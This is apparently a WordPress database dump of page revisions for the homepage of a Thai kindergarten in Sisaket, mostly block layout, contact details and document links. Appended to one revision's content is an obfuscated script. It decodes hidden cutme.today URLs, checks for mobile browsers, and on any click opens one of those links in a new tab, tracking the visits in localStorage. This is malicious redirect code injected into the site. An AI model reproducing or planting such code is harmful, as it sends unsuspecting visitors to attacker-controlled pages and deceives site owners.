{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:12:34','2024-08-30 03:12:34','',19,'http://watprato.ssk.in.th/?p=297',0,'revision','',0),
(298,2,'2024-08-30 10:13:02','2024-08-30 03:13:02','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- 